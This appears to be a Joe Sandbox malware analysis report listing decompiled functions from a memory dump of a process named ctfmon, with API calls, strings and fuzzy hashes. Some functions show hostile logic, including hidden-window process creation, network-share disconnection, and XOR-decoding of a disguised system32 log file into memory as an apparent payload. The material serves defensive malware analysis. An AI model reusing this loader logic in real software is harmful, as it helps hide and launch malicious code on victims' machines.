                                                Uniqueness Score: -1.00%

                                                Function 00964F50 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 52processCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 75%
                                                			E00964F50(CHAR* __ecx, CHAR* __edx, void* __eflags, CHAR* _a4) {
				struct _STARTUPINFOA _v72;
				void* __edi;
				void* __esi;
				signed int _t17;
				CHAR* _t20;
				CHAR* _t23;
				void* _t24;
				struct _PROCESS_INFORMATION* _t25;
				void* _t28;

				_t28 = __eflags;
				_t23 = __edx;
				_t20 = __ecx;
				E00973440(__edx,  &_v72, 0, 0x44);
				_t25 = E00970A6E(_t24, _t28, 0x10);
				E00973440(_t23,  &_v72, 0, 0x44);
				asm("xorps xmm0, xmm0");
				asm("movups [esi], xmm0");
				GetStartupInfoA( &_v72);
				_v72.cb = 0x44;
				_v72.wShowWindow = 0;
				_v72.dwFlags = 1;
				_t17 = CreateProcessA(_t20, _t23, 0, 0, 0, 0x20, 0, _a4,  &_v72, _t25);
				asm("sbb eax, eax");
				return  ~_t17 & _t25;
			}












                                                0x00964f50
                                                0x00964f5e
                                                0x00964f63
                                                0x00964f65
                                                0x00964f73
                                                0x00964f7b
                                                0x00964f86
                                                0x00964f89
                                                0x00964f8d
                                                0x00964f96
                                                0x00964f9d
                                                0x00964fa8
                                                0x00964fbb
                                                0x00964fc4
                                                0x00964fcd

                                                APIs
                                                • new.LIBCMT ref: 00964F6C
                                                • GetStartupInfoA.KERNEL32(?), ref: 00964F8D
                                                • CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000020,00000000,0096985B,00000044,00000000,?,?,?,?,73BCF7E0,00000000), ref: 00964FBB
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID: CreateInfoProcessStartup
                                                • String ID: D
                                                • API String ID: 525363069-2746444292
                                                • Opcode ID: da74de8f4662ac6e781073b361ec3892808c27ea6ceb619cf74f21a49d4c505d
                                                • Instruction ID: 77b5f39b5b1891a4ebbc548a8c43fde04d9e52676309d99f364317acb5317279
                                                • Opcode Fuzzy Hash: da74de8f4662ac6e781073b361ec3892808c27ea6ceb619cf74f21a49d4c505d
                                                • Instruction Fuzzy Hash: 640188B1A4030876EB20DFA08D46FDE77ACDF44B04F204125B708FA1C1E6B5AA444395
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0096B1F0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46shareCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 83%
                                                			E0096B1F0(intOrPtr* __ecx, void* __esi) {
				signed int _v8;
				char _v268;
				char _v528;
				signed int _t12;
				char _t14;
				long _t20;
				intOrPtr* _t25;
				void* _t32;
				signed int _t34;

				_t25 = __ecx;
				_t12 =  *0x98f008; // 0x35554c2f
				_v8 = _t12 ^ _t34;
				_t32 =  &_v268 - __ecx;
				do {
					_t14 =  *_t25;
					_t25 = _t25 + 1;
					 *((char*)(_t32 + _t25 - 1)) = _t14;
				} while (_t14 != 0);
				E0096A2B0( &_v268);
				E00963F90( &_v268,  &_v528, "\\\\%s",  &_v268);
				_t20 = WNetCancelConnection2A( &_v528, 0, 1);
				if(_t20 != 0) {
					SetLastError(_t20);
					return E00970A5D(_v8 ^ _t34, __esi);
				} else {
					return E00970A5D(_v8 ^ _t34, __esi);
				}
			}












                                                0x0096b1f0
                                                0x0096b1f9
                                                0x0096b200
                                                0x0096b209
                                                0x0096b210
                                                0x0096b210
                                                0x0096b212
                                                0x0096b215
                                                0x0096b219
                                                0x0096b223
                                                0x0096b23b
                                                0x0096b24e
                                                0x0096b256
                                                0x0096b26c
                                                0x0096b281
                                                0x0096b258
                                                0x0096b26a
                                                0x0096b26a

                                                APIs
                                                • WNetCancelConnection2A.MPR(?,00000000,00000001), ref: 0096B24E
                                                • SetLastError.KERNEL32(00000000), ref: 0096B26C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID: CancelConnection2ErrorLast
                                                • String ID: /LU5/$\\%s
                                                • API String ID: 822135197-2245926631
                                                • Opcode ID: c87e399e97f6c7a0455b627d870c9ac1aee644f0ae036c0c0b139195cf54585a
                                                • Instruction ID: c79ac55f7de2b57defef9cd1581624629cbb9ebe5d6ea2a036f567edf2d7b21d
                                                • Opcode Fuzzy Hash: c87e399e97f6c7a0455b627d870c9ac1aee644f0ae036c0c0b139195cf54585a
                                                • Instruction Fuzzy Hash: B3017575A0820CDBCB20DFB4DC59BE9B7B8EB55304F1041E9E85DDB282EE715A888B50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0097932B Relevance: 6.3, APIs: 4, Instructions: 305COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 75%
                                                			E0097932B(void* __edx, signed int* _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, signed int _a28, intOrPtr _a32, intOrPtr _a36) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				char _v40;
				intOrPtr _v48;
				char _v52;
				void* __ebx;
				void* __edi;
				void* _t86;
				signed int _t92;
				signed int _t93;
				signed int _t94;
				signed int _t100;
				void* _t101;
				void* _t102;
				void* _t104;
				void* _t107;
				void* _t109;
				void* _t111;
				void* _t115;
				char* _t116;
				void* _t119;
				signed int _t121;
				signed int _t128;
				signed int* _t129;
				signed int _t136;
				signed int _t137;
				char _t138;
				signed int _t139;
				signed int _t142;
				signed int _t146;
				signed int _t151;
				char _t156;
				char _t157;
				void* _t161;
				unsigned int _t162;
				signed int _t164;
				signed int _t166;
				signed int _t170;
				void* _t171;
				signed int* _t172;
				signed int _t174;
				signed int _t181;
				signed int _t182;
				signed int _t183;
				signed int _t184;
				signed int _t185;
				signed int _t186;
				signed int _t187;

				_t171 = __edx;
				_t181 = _a24;
				if(_t181 < 0) {
					_t181 = 0;
				}
				_t184 = _a8;
				 *_t184 = 0;
				E00974970(0,  &_v52, _t171, _a36);
				_t5 = _t181 + 0xb; // 0xb
				if(_a12 > _t5) {
					_t172 = _a4;
					_t142 = _t172[1];
					_v36 =  *_t172;
					__eflags = (_t142 >> 0x00000014 & 0x000007ff) - 0x7ff;
					if((_t142 >> 0x00000014 & 0x000007ff) != 0x7ff) {
						L11:
						__eflags = _t142 & 0x80000000;
						if((_t142 & 0x80000000) != 0) {
							 *_t184 = 0x2d;
							_t184 = _t184 + 1;
							__eflags = _t184;
						}
						__eflags = _a28;
						_v16 = 0x3ff;
						_t136 = ((0 | _a28 == 0x00000000) - 0x00000001 & 0xffffffe0) + 0x27;
						__eflags = _t172[1] & 0x7ff00000;
						_v32 = _t136;
						_t86 = 0x30;
						if((_t172[1] & 0x7ff00000) != 0) {
							 *_t184 = 0x31;
							_t185 = _t184 + 1;
							__eflags = _t185;
						} else {
							 *_t184 = _t86;
							_t185 = _t184 + 1;
							_t164 =  *_t172 | _t172[1] & 0x000fffff;
							__eflags = _t164;
							if(_t164 != 0) {
								_v16 = 0x3fe;
							} else {
								_v16 = _v16 & _t164;
							}
						}
						_t146 = _t185;
						_t186 = _t185 + 1;
						_v28 = _t146;
						__eflags = _t181;
						if(_t181 != 0) {
							_t30 = _v48 + 0x88; // 0xffce8305
							 *_t146 =  *((intOrPtr*)( *((intOrPtr*)( *_t30))));
						} else {
							 *_t146 = 0;
						}
						_t92 = _t172[1] & 0x000fffff;
						__eflags = _t92;
						_v20 = _t92;
						if(_t92 > 0) {
							L23:
							_t33 =  &_v8;
							 *_t33 = _v8 & 0x00000000;
							__eflags =  *_t33;
							_t147 = 0xf0000;
							_t93 = 0x30;
							_v12 = _t93;
							_v20 = 0xf0000;
							do {
								__eflags = _t181;
								if(_t181 <= 0) {
									break;
								}
								_t119 = E00983C50( *_t172 & _v8, _v12, _t172[1] & _t147 & 0x000fffff);
								_t161 = 0x30;
								_t121 = _t119 + _t161 & 0x0000ffff;
								__eflags = _t121 - 0x39;
								if(_t121 > 0x39) {
									_t121 = _t121 + _t136;
									__eflags = _t121;
								}
								_t162 = _v20;
								_t172 = _a4;
								 *_t186 = _t121;
								_t186 = _t186 + 1;
								_v8 = (_t162 << 0x00000020 | _v8) >> 4;
								_t147 = _t162 >> 4;
								_t93 = _v12 - 4;
								_t181 = _t181 - 1;
								_v20 = _t162 >> 4;
								_v12 = _t93;
								__eflags = _t93;
							} while (_t93 >= 0);
							__eflags = _t93;
							if(_t93 < 0) {
								goto L39;
							}
							_t115 = E00983C50( *_t172 & _v8, _v12, _t172[1] & _t147 & 0x000fffff);
							__eflags = _t115 - 8;
							if(_t115 <= 8) {
								goto L39;
							}
							_t116 = _t186 - 1;
							_t138 = 0x30;
							while(1) {
								_t156 =  *_t116;
								__eflags = _t156 - 0x66;
								if(_t156 == 0x66) {
									goto L33;
								}
								__eflags = _t156 - 0x46;
								if(_t156 != 0x46) {
									_t139 = _v32;
									__eflags = _t116 - _v28;
									if(_t116 == _v28) {
										_t57 = _t116 - 1;
										 *_t57 =  *(_t116 - 1) + 1;
										__eflags =  *_t57;
									} else {
										_t157 =  *_t116;
										__eflags = _t157 - 0x39;
										if(_t157 != 0x39) {
											 *_t116 = _t157 + 1;
										} else {
											 *_t116 = _t139 + 0x3a;
										}
									}
									goto L39;
								}
								L33:
								 *_t116 = _t138;
								_t116 = _t116 - 1;
							}
						} else {
							__eflags =  *_t172;
							if( *_t172 <= 0) {
								L39:
								__eflags = _t181;
								if(_t181 > 0) {
									_push(_t181);
									_t111 = 0x30;
									_push(_t111);
									_push(_t186);
									E00973440(_t181);
									_t186 = _t186 + _t181;
									__eflags = _t186;
								}
								_t94 = _v28;
								__eflags =  *_t94;
								if( *_t94 == 0) {
									_t186 = _t94;
								}
								__eflags = _a28;
								 *_t186 = ((_t94 & 0xffffff00 | _a28 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x70;
								_t174 = _a4[1];
								_t100 = E00983C50( *_a4, 0x34, _t174);
								_t137 = 0;
								_t151 = (_t100 & 0x000007ff) - _v16;
								__eflags = _t151;
								asm("sbb ebx, ebx");
								if(__eflags < 0) {
									L47:
									 *(_t186 + 1) = 0x2d;
									_t187 = _t186 + 2;
									__eflags = _t187;
									_t151 =  ~_t151;
									asm("adc ebx, 0x0");
									_t137 =  ~_t137;
									goto L48;
								} else {
									if(__eflags > 0) {
										L46:
										 *(_t186 + 1) = 0x2b;
										_t187 = _t186 + 2;
										L48:
										_t182 = _t187;
										_t101 = 0x30;
										 *_t187 = _t101;
										__eflags = _t137;
										if(__eflags < 0) {
											L56:
											__eflags = _t187 - _t182;
											if(_t187 != _t182) {
												L60:
												_push(0);
												_push(0xa);
												_push(_t137);
												_push(_t151);
												_t102 = E00983B70();
												_v32 = _t174;
												 *_t187 = _t102 + 0x30;
												_t187 = _t187 + 1;
												__eflags = _t187;
												L61:
												_t104 = 0x30;
												_t183 = 0;
												__eflags = 0;
												 *_t187 = _t151 + _t104;
												 *(_t187 + 1) = 0;
												goto L62;
											}
											__eflags = _t137;
											if(__eflags < 0) {
												goto L61;
											}
											if(__eflags > 0) {
												goto L60;
											}
											__eflags = _t151 - 0xa;
											if(_t151 < 0xa) {
												goto L61;
											}
											goto L60;
										}
										if(__eflags > 0) {
											L51:
											_push(0);
											_push(0x3e8);
											_push(_t137);
											_push(_t151);
											_t107 = E00983B70();
											_v32 = _t174;
											 *_t187 = _t107 + 0x30;
											_t187 = _t187 + 1;
											__eflags = _t187 - _t182;
											if(_t187 != _t182) {
												L55:
												_push(0);
												_push(0x64);
												_push(_t137);
												_push(_t151);
												_t109 = E00983B70();
												_v32 = _t174;
												 *_t187 = _t109 + 0x30;
												_t187 = _t187 + 1;
												__eflags = _t187;
												goto L56;
											}
											L52:
											__eflags = _t137;
											if(__eflags < 0) {
												goto L56;
											}
											if(__eflags > 0) {
												goto L55;
											}
											__eflags = _t151 - 0x64;
											if(_t151 < 0x64) {
												goto L56;
											}
											goto L55;
										}
										__eflags = _t151 - 0x3e8;
										if(_t151 < 0x3e8) {
											goto L52;
										}
										goto L51;
									}
									__eflags = _t151;
									if(_t151 < 0) {
										goto L47;
									}
									goto L46;
								}
							}
							goto L23;
						}
					}
					__eflags = 0;
					if(0 != 0) {
						goto L11;
					} else {
						_t183 = E0097962E(0, _t142, 0, _t172, _t184, _a12, _a16, _a20, _t181, 0, _a32, 0);
						__eflags = _t183;
						if(_t183 == 0) {
							_t128 = E00984330(_t184, 0x65);
							_pop(_t166);
							__eflags = _t128;
							if(_t128 != 0) {
								__eflags = _a28;
								_t170 = ((_t166 & 0xffffff00 | _a28 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x70;
								__eflags = _t170;
								 *_t128 = _t170;
								 *((char*)(_t128 + 3)) = 0;
							}
							_t183 = 0;
						} else {
							 *_t184 = 0;
						}
						goto L62;
					}
				} else {
					_t129 = E00975D43();
					_t183 = 0x22;
					 *_t129 = _t183;
					E00975C10();
					L62:
					if(_v40 != 0) {
						 *(_v52 + 0x350) =  *(_v52 + 0x350) & 0xfffffffd;
					}
					return _t183;
				}
			}
























































                                                0x0097932b
                                                0x00979336
                                                0x0097933d
                                                0x0097933f
                                                0x0097933f
                                                0x00979341
                                                0x0097934a
                                                0x0097934c
                                                0x00979351
                                                0x00979357
                                                0x0097936d
                                                0x00979372
                                                0x00979375
                                                0x00979382
                                                0x00979387
                                                0x009793db
                                                0x009793e3
                                                0x009793e5
                                                0x009793e7
                                                0x009793ea
                                                0x009793ea
                                                0x009793ea
                                                0x009793f0
                                                0x009793f8
                                                0x0097940b
                                                0x0097940e
                                                0x00979410
                                                0x00979413
                                                0x00979414
                                                0x00979435
                                                0x00979438
                                                0x00979438
                                                0x00979416
                                                0x00979416
                                                0x00979418
                                                0x00979423
                                                0x00979423
                                                0x00979425
                                                0x0097942c
                                                0x00979427
                                                0x00979427
                                                0x00979427
                                                0x00979425
                                                0x00979439
                                                0x0097943b
                                                0x0097943c
                                                0x0097943f
                                                0x00979441
                                                0x0097944b
                                                0x00979455
                                                0x00979443
                                                0x00979443
                                                0x00979443
                                                0x0097945a
                                                0x0097945a
                                                0x0097945f
                                                0x00979462
                                                0x0097946d
                                                0x0097946d
                                                0x0097946d
                                                0x0097946d
                                                0x00979471
                                                0x00979478
                                                0x00979479
                                                0x0097947c
                                                0x0097947f
                                                0x0097947f
                                                0x00979481
                                                0x00000000
                                                0x00000000
                                                0x00979499
                                                0x009794a0
                                                0x009794a4
                                                0x009794a7
                                                0x009794aa
                                                0x009794ac
                                                0x009794ac
                                                0x009794ac
                                                0x009794ae
                                                0x009794b1
                                                0x009794b4
                                                0x009794b6
                                                0x009794be
                                                0x009794c4
                                                0x009794c7
                                                0x009794ca
                                                0x009794cb
                                                0x009794ce
                                                0x009794d1
                                                0x009794d1
                                                0x009794d6
                                                0x009794d9
                                                0x00000000
                                                0x00000000
                                                0x009794f1
                                                0x009794f6
                                                0x009794fa
                                                0x00000000
                                                0x00000000
                                                0x009794fe
                                                0x00979501
                                                0x00979502
                                                0x00979502
                                                0x00979504
                                                0x00979507
                                                0x00000000
                                                0x00000000
                                                0x00979509
                                                0x0097950c
                                                0x00979513
                                                0x00979516
                                                0x00979519
                                                0x0097952f
                                                0x0097952f
                                                0x0097952f
                                                0x0097951b
                                                0x0097951b
                                                0x0097951d
                                                0x00979520
                                                0x0097952b
                                                0x00979522
                                                0x00979525
                                                0x00979525
                                                0x00979520
                                                0x00000000
                                                0x00979519
                                                0x0097950e
                                                0x0097950e
                                                0x00979510
                                                0x00979510
                                                0x00979464
                                                0x00979464
                                                0x00979467
                                                0x00979532
                                                0x00979532
                                                0x00979534
                                                0x00979536
                                                0x00979539
                                                0x0097953a
                                                0x0097953b
                                                0x0097953c
                                                0x00979544
                                                0x00979544
                                                0x00979544
                                                0x00979546
                                                0x00979549
                                                0x0097954c
                                                0x0097954e
                                                0x0097954e
                                                0x00979550
                                                0x00979562
                                                0x00979566
                                                0x00979569
                                                0x00979570
                                                0x00979578
                                                0x00979578
                                                0x0097957b
                                                0x0097957d
                                                0x0097958e
                                                0x0097958e
                                                0x00979592
                                                0x00979592
                                                0x00979595
                                                0x00979597
                                                0x0097959a
                                                0x00000000
                                                0x0097957f
                                                0x0097957f
                                                0x00979585
                                                0x00979585
                                                0x00979589
                                                0x0097959c
                                                0x0097959c
                                                0x009795a0
                                                0x009795a1
                                                0x009795a3
                                                0x009795a5
                                                0x009795e6
                                                0x009795e6
                                                0x009795e8
                                                0x009795f5
                                                0x009795f5
                                                0x009795f7
                                                0x009795f9
                                                0x009795fa
                                                0x009795fb
                                                0x00979602
                                                0x00979605
                                                0x00979607
                                                0x00979607
                                                0x00979608
                                                0x0097960a
                                                0x0097960d
                                                0x0097960d
                                                0x0097960f
                                                0x00979611
                                                0x00000000
                                                0x00979611
                                                0x009795ea
                                                0x009795ec
                                                0x00000000
                                                0x00000000
                                                0x009795ee
                                                0x00000000
                                                0x00000000
                                                0x009795f0
                                                0x009795f3
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x009795f3
                                                0x009795ac
                                                0x009795b2
                                                0x009795b2
                                                0x009795b4
                                                0x009795b5
                                                0x009795b6
                                                0x009795b7
                                                0x009795be
                                                0x009795c1
                                                0x009795c3
                                                0x009795c4
                                                0x009795c6
                                                0x009795d3
                                                0x009795d3
                                                0x009795d5
                                                0x009795d7
                                                0x009795d8
                                                0x009795d9
                                                0x009795e0
                                                0x009795e3
                                                0x009795e5
                                                0x009795e5
                                                0x00000000
                                                0x009795e5
                                                0x009795c8
                                                0x009795c8
                                                0x009795ca
                                                0x00000000
                                                0x00000000
                                                0x009795cc
                                                0x00000000
                                                0x00000000
                                                0x009795ce
                                                0x009795d1
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x009795d1
                                                0x009795ae
                                                0x009795b0
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x009795b0
                                                0x00979581
                                                0x00979583
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00979583
                                                0x0097957d
                                                0x00000000
                                                0x00979467
                                                0x00979462
                                                0x00979389
                                                0x0097938b
                                                0x00000000
                                                0x0097938d
                                                0x009793a3
                                                0x009793a8
                                                0x009793aa
                                                0x009793b6
                                                0x009793bc
                                                0x009793bd
                                                0x009793bf
                                                0x009793c1
                                                0x009793cc
                                                0x009793cc
                                                0x009793cf
                                                0x009793d1
                                                0x009793d1
                                                0x009793d4
                                                0x009793ac
                                                0x009793ac
                                                0x009793ac
                                                0x00000000
                                                0x009793aa
                                                0x00979359
                                                0x00979359
                                                0x00979360
                                                0x00979361
                                                0x00979363
                                                0x00979615
                                                0x00979619
                                                0x0097961e
                                                0x0097961e
                                                0x0097962d
                                                0x0097962d

                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID: __alldvrm$_strrchr
                                                • String ID:
                                                • API String ID: 1036877536-0
                                                • Opcode ID: 77f5d455d6bbc46f51ca056e9603e57878b5f4042b499e8e25835957a280ac19
                                                • Instruction ID: bd1480178eadc83491121b90544eebda7d3f50c5fe6ee049f7278b9c57d5e48d
                                                • Opcode Fuzzy Hash: 77f5d455d6bbc46f51ca056e9603e57878b5f4042b499e8e25835957a280ac19
                                                • Instruction Fuzzy Hash: 63A15973A047569FDB22CF28C8917BEBBE9EF55310F18816DE88D9B281D2388D42C750
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0096AE20 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 118memoryCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 51%
                                                			E0096AE20(void* __ecx, void* __edi, void* __eflags) {
				signed int _v8;
				intOrPtr _v28;
				char _v60;
				intOrPtr _v64;
				signed int _v68;
				char _v72;
				signed int _v76;
				char _v80;
				char _v84;
				void* __esi;
				signed int _t30;
				void* _t34;
				void* _t36;
				long _t41;
				void* _t42;
				void* _t43;
				void* _t60;
				intOrPtr _t64;
				signed int _t67;
				void* _t70;
				void* _t71;
				void* _t72;
				void* _t73;
				void* _t75;
				signed int _t76;
				signed int _t78;
				signed int _t79;

				_t78 = (_t76 & 0xfffffff0) - 0x58;
				_t30 =  *0x98f008; // 0x35554c2f
				_v8 = _t30 ^ _t78;
				_v72 = 0;
				_v80 = 0;
				_t34 = E00964AC0(__ecx, 0x48a,  &_v72,  &_v80);
				_t79 = _t78 + 8;
				if(_t34 != 0) {
					_v84 = 0;
					_v76 = 0;
					_t36 = E00964E60("C:\\Windows\\system32\\msvcwme.log",  &_v84,  &_v76);
					_t79 = _t79 + 4;
					if(_t36 == 0) {
						goto L1;
					} else {
						_t67 = _v76;
						_t41 = _v80 + 0x2c + _t67;
						 *0x996a40 = _t41;
						_t42 = LocalAlloc(0x40, _t41);
						asm("xorps xmm0, xmm0");
						 *0x996a44 = _t42;
						_t43 = 0;
						asm("movq [esp+0x44], xmm0");
						_v68 = _t67;
						asm("movups [esp+0x24], xmm0");
						_v64 = 0x77;
						asm("movups [esp+0x34], xmm0");
						if(_t67 != 0) {
							_t64 = _v84;
							if(_t67 >= 0x20) {
								asm("movaps xmm1, [0x98cfa0]");
								_t75 = _t67 - (_t67 & 0x0000001f);
								_t60 = _t64 + 0x10;
								do {
									asm("movups xmm0, [ecx-0x10]");
									_t43 = _t43 + 0x20;
									_t60 = _t60 + 0x20;
									asm("pxor xmm0, xmm1");
									asm("movups [ecx-0x30], xmm0");
									asm("movups xmm0, [ecx-0x20]");
									asm("pxor xmm0, xmm1");
									asm("movups [ecx-0x20], xmm0");
								} while (_t43 < _t75);
							}
							while(_t43 < _t67) {
								 *(_t43 + _t64) =  *(_t43 + _t64) ^ 0x00000077;
								_t43 = _t43 + 1;
							}
						}
						E009647A0(_v84, _t67, _t67,  &_v60);
						_t71 =  *0x996a44;
						E00983DB0(_t71, _v72, _v80);
						_t72 = _t71 + _v80;
						E00983DB0(_t72, _v84, _t67);
						asm("movups xmm0, [esp+0x2c]");
						asm("movups [esi+edi], xmm0");
						asm("movups xmm0, [esp+0x30]");
						asm("movups [esi+edi+0x10], xmm0");
						asm("movq xmm0, [esp+0x40]");
						asm("movq [esi+edi+0x20], xmm0");
						 *((intOrPtr*)(_t72 + _t67 + 0x28)) = _v28;
						_pop(_t73);
						return E00970A5D(_v8 ^ _t79 + 0x1c, _t73);
					}
				} else {
					L1:
					_pop(_t70);
					return E00970A5D(_v8 ^ _t79, _t70);
				}
			}






























                                                0x0096ae26
                                                0x0096ae29
                                                0x0096ae30
                                                0x0096ae3a
                                                0x0096ae47
                                                0x0096ae55
                                                0x0096ae5a
                                                0x0096ae5f
                                                0x0096ae78
                                                0x0096ae85
                                                0x0096ae92
                                                0x0096ae97
                                                0x0096ae9c
                                                0x00000000
                                                0x0096ae9e
                                                0x0096aea2
                                                0x0096aea9
                                                0x0096aeae
                                                0x0096aeb3
                                                0x0096aeb9
                                                0x0096aebc
                                                0x0096aec1
                                                0x0096aec3
                                                0x0096aec9
                                                0x0096aecd
                                                0x0096aed2
                                                0x0096aeda
                                                0x0096aee1
                                                0x0096aee3
                                                0x0096aeea
                                                0x0096aeec
                                                0x0096aefa
                                                0x0096aefc
                                                0x0096af00
                                                0x0096af00
                                                0x0096af04
                                                0x0096af07
                                                0x0096af0a
                                                0x0096af0e
                                                0x0096af12
                                                0x0096af16
                                                0x0096af1a
                                                0x0096af1e
                                                0x0096af00
                                                0x0096af24
                                                0x0096af26
                                                0x0096af2a
                                                0x0096af2b
                                                0x0096af24
                                                0x0096af3a
                                                0x0096af3f
                                                0x0096af51
                                                0x0096af56
                                                0x0096af63
                                                0x0096af68
                                                0x0096af74
                                                0x0096af78
                                                0x0096af7d
                                                0x0096af82
                                                0x0096af88
                                                0x0096af92
                                                0x0096af99
                                                0x0096afa4
                                                0x0096afa4
                                                0x0096ae61
                                                0x0096ae61
                                                0x0096ae64
                                                0x0096ae73
                                                0x0096ae73

                                                APIs
                                                • LocalAlloc.KERNEL32(00000040,?,?,?,73B76490), ref: 0096AEB3
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID: AllocLocal
                                                • String ID: /LU5/$C:\Windows\system32\msvcwme.log$w
                                                • API String ID: 3494564517-1529180872
                                                • Opcode ID: 957e1081d822afa64b6928e82731804fa7def0b0ffb41e02a937e3f82eaa3bf7
                                                • Instruction ID: 3fec84633386ec39cff48670d017ffebbaaca980c39bd9593d2b7ebc2aa82fbf
                                                • Opcode Fuzzy Hash: 957e1081d822afa64b6928e82731804fa7def0b0ffb41e02a937e3f82eaa3bf7
                                                • Instruction Fuzzy Hash: E541C1729187418BC711CF28D94166BB7E5BFD9308F045B0DF88967212EB31EA988B97
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0097917C Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 53COMMONLIBRARYCODE
                                                Download Yara Rule
                                                C-Code - Quality: 81%
                                                			E0097917C(void* __ecx) {
				intOrPtr _t2;
				void* _t4;
				void* _t10;
				void* _t11;
				void* _t13;
				void* _t15;
				long _t16;

				_t11 = __ecx;
				_t16 = GetLastError();
				_t10 = 0;
				_t2 =  *0x990558; // 0x6
				_t19 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L2:
					_t15 = E009778D0(_t11, 1, 0x364);
					_pop(_t13);
					if(_t15 != 0) {
						_t4 = E00977F1D(_t13, __eflags,  *0x990558, _t15);
						__eflags = _t4;
						if(_t4 != 0) {
							E00978F6A(_t13, _t15, 0x996690);
							E00977848(_t10);
							__eflags = _t15;
							if(_t15 != 0) {
								goto L9;
							} else {
								goto L8;
							}
						} else {
							_push(_t15);
							goto L4;
						}
					} else {
						_push(_t10);
						L4:
						E00977848();
						L8:
						SetLastError(_t16);
					}
				} else {
					_t15 = E00977EC7(_t11, _t19, _t2);
					if(_t15 != 0) {
						L9:
						SetLastError(_t16);
						_t10 = _t15;
					} else {
						goto L2;
					}
				}
				return _t10;
			}










                                                0x0097917c
                                                0x00979187
                                                0x00979189
                                                0x0097918b
                                                0x00979190
                                                0x00979193
                                                0x009791a1
                                                0x009791ad
                                                0x009791b0
                                                0x009791b3
                                                0x009791c5
                                                0x009791ca
                                                0x009791cc
                                                0x009791d7
                                                0x009791dd
                                                0x009791e5
                                                0x009791e7
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x009791ce
                                                0x009791ce
                                                0x00000000
                                                0x009791ce
                                                0x009791b5
                                                0x009791b5
                                                0x009791b6
                                                0x009791b6
                                                0x009791e9
                                                0x009791ea
                                                0x009791ea
                                                0x00979195
                                                0x0097919b
                                                0x0097919f
                                                0x009791f2
                                                0x009791f3
                                                0x009791f9
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0097919f
                                                0x00979200

                                                APIs
                                                • GetLastError.KERNEL32(123,77109EB0,73B76490,00975D48,009778C5,00000000,?,00970A9A,77109EB0,?,00969C60,00000100,?,77109EB0), ref: 00979181
                                                • SetLastError.KERNEL32(00000000,?,77109EB0), ref: 009791EA
                                                • SetLastError.KERNEL32(00000000,?,77109EB0), ref: 009791F3
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID: ErrorLast
                                                • String ID: 123
                                                • API String ID: 1452528299-2286445522
                                                • Opcode ID: 84c1ddd117fc2819d81a5fc59119c07cce5910b72627cc986a95903ac8e7d20e
                                                • Instruction ID: 48dfdff4320f145d6b8e39a58c27a833f5cd0fbee765b20210ee28d501a12c60
                                                • Opcode Fuzzy Hash: 84c1ddd117fc2819d81a5fc59119c07cce5910b72627cc986a95903ac8e7d20e
                                                • Instruction Fuzzy Hash: FE017D3724C6022FC7016B795CCDF2B262FDBC2371762C424F81DD6291EE648C119151
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00977CDE Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                Download Yara Rule
                                                C-Code - Quality: 95%
                                                			E00977CDE(signed int _a4) {
				signed int _t9;
				void* _t13;
				signed int _t15;
				WCHAR* _t22;
				signed int _t24;
				signed int* _t25;
				void* _t27;

				_t9 = _a4;
				_t25 = 0x9963a8 + _t9 * 4;
				_t24 =  *_t25;
				if(_t24 == 0) {
					_t22 =  *(0x9862a0 + _t9 * 4);
					_t27 = LoadLibraryExW(_t22, 0, 0x800);
					if(_t27 != 0) {
						L8:
						 *_t25 = _t27;
						if( *_t25 != 0) {
							FreeLibrary(_t27);
						}
						_t13 = _t27;
						L11:
						return _t13;
					}
					_t15 = GetLastError();
					if(_t15 != 0x57) {
						_t27 = 0;
					} else {
